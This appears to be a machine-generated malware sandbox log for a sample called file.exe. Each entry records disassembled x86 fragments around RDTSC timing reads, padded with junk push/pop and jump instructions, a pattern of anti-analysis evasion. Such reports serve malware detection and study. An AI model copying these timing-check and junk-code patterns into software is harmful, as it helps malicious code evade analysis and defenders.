Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E9C5 second address: D7E9CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EC5B second address: D7EC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F6969412EA6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7F241 second address: D7F247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7F247 second address: D7F25D instructions: 0x00000000 rdtsc 0x00000002 js 00007F6969412EA6h 0x00000008 jmp 00007F6969412EACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D515B9 second address: D32548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jng 00007F6968D5474Fh 0x0000000d jmp 00007F6968D54749h 0x00000012 nop 0x00000013 lea eax, dword ptr [ebp+1249633Ch] 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c jno 00007F6968D54736h 0x00000022 jmp 00007F6968D54746h 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e popad 0x0000002f mov dword ptr [esp], eax 0x00000032 pushad 0x00000033 movsx edi, ax 0x00000036 movsx eax, ax 0x00000039 popad 0x0000003a call dword ptr [ebp+122D30FEh] 0x00000040 push eax 0x00000041 push edx 0x00000042 jo 00007F6968D54738h 0x00000048 push eax 0x00000049 pop eax 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51C9B second address: D51CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6969412EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51D09 second address: D51D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51D14 second address: D51D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 xchg eax, esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6969412EAAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51D28 second address: D51D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F6968D54736h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D524AA second address: D524AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52672 second address: D52676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52814 second address: D52818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52818 second address: D52845 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F6968D5473Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F6968D54740h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52845 second address: D5284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8351D second address: D83529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6968D54736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83529 second address: D83538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6969412EA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83538 second address: D83542 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83542 second address: D83550 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007F6969412EA6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83550 second address: D83575 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6968D54747h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D837E4 second address: D837FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6969412EB0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DBB8 second address: D0DBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D5473Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DBC6 second address: D0DBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DBCA second address: D0DBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D5473Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AACD second address: D8AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A242 second address: D8A248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A248 second address: D8A24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A24C second address: D8A25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F6968D54736h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AF16 second address: D8AF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AF29 second address: D8AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AF2D second address: D8AF7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F6969412EB9h 0x00000015 jmp 00007F6969412EB4h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 jl 00007F6969412EA6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AF7D second address: D8AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AF81 second address: D8AF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91EB3 second address: D91EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6968D54748h 0x0000000b jmp 00007F6968D5473Bh 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91EE1 second address: D91EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91EE7 second address: D91F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6968D54738h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D54745h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91F0E second address: D91F1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F6969412EA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91F1D second address: D91F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91F23 second address: D91F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91BAB second address: D91BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6968D5473Fh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F6968D54744h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91BDD second address: D91BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BD4F second address: D9BD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BD53 second address: D9BD5D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6969412EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BD5D second address: D9BD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6968D5473Ah 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AEB8 second address: D9AEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AEC1 second address: D9AEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AEC5 second address: D9AED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AED8 second address: D9AEF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6968D54746h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9B359 second address: D9B371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6969412EB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9B50E second address: D9B514 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9B6AD second address: D9B6D1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F6969412EB1h 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9B6D1 second address: D9B6E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F6968D54736h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9B856 second address: D9B865 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6969412EA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA0246 second address: DA024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA024A second address: DA0250 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA0250 second address: DA025A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6968D54736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA025A second address: DA025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA03AF second address: DA03C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA03C1 second address: DA03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52266 second address: D5226A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5226A second address: D52274 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA159D second address: DA15A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA15A3 second address: DA15A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA478F second address: DA47A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54746h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE6C7 second address: CFE6D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE6D1 second address: CFE6D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE6D7 second address: CFE6DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE6DC second address: CFE6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE6E2 second address: CFE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA470 second address: DAA4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6968D54736h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F6968D54744h 0x00000011 jmp 00007F6968D54746h 0x00000016 jnc 00007F6968D54736h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAAD5A second address: DAAD75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAAD75 second address: DAAD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB366 second address: DAB38A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F6969412EB7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB38A second address: DAB3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F6968D54744h 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB688 second address: DAB68E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB68E second address: DAB6AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6968D54749h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB6AD second address: DAB6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB6B1 second address: DAB6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007F6968D54744h 0x0000000f jmp 00007F6968D54743h 0x00000014 pop esi 0x00000015 jng 00007F6968D5473Eh 0x0000001b push edx 0x0000001c pop edx 0x0000001d jl 00007F6968D54736h 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB6F7 second address: DAB6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB6FB second address: DAB705 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6968D54736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB9BC second address: DAB9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F6969412EA6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB9CD second address: DABA19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6968D5473Dh 0x0000000c jnl 00007F6968D54736h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6968D5473Dh 0x0000001b pushad 0x0000001c jmp 00007F6968D54743h 0x00000021 jnc 00007F6968D54736h 0x00000027 jne 00007F6968D54736h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DABA19 second address: DABA3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F6969412EA6h 0x00000009 jmp 00007F6969412EB1h 0x0000000e pop esi 0x0000000f jo 00007F6969412EACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DABCAE second address: DABCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F6968D54741h 0x0000000b jmp 00007F6968D54745h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5441 second address: DB5460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007F6969412EABh 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB458B second address: DB45CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6968D54736h 0x0000000a jnc 00007F6968D54736h 0x00000010 jng 00007F6968D54736h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6968D54743h 0x0000001e jmp 00007F6968D54746h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB485A second address: DB487D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jno 00007F6969412EA6h 0x00000012 jp 00007F6969412EA6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB487D second address: DB489B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D54744h 0x00000009 js 00007F6968D54736h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB4D1D second address: DB4D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5149 second address: DB516E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007F6968D54736h 0x00000011 jmp 00007F6968D54742h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB516E second address: DB5173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5173 second address: DB517E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC22C second address: DBC271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F6969412EB9h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F6969412EBEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC271 second address: DBC276 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
